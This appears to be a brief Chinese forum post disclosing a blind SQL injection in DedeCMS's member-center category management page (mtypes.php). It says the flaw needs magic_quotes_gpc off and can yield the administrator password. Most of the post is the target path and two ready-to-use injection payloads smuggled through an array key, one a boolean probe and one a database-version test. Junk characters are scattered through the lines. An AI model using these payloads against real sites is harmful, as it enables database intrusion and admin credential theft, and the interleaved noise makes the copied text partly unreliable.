DedeCMS会员中心分类管理SQL注射0day漏洞可获得管理员密码

admin

需要magic_quotes_gpc = Off,所以说是鸡肋啊.


发生在数组key里的注射漏洞,有点意思.
8 N4 P$ \6 Z) U. i( W0 l1 G: W7 ^7 d) S' x
) B4 g8 s3 n. x3 \0 O6 a这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下

8 J. ?% V$ g. n1 [0 i* Thttp://www.xxx.com /dede/member/mtypes.php?dopost=save

exploit:
6 I: K) m7 s# {7 G/ l7 e: hmtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r
: K# S+ u5 Y9 Vmtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and '3'%3D'3]=c4rp3nt3r
$ c3 B6 ]0 y0 E8 w. y9 c' M& N4 D) W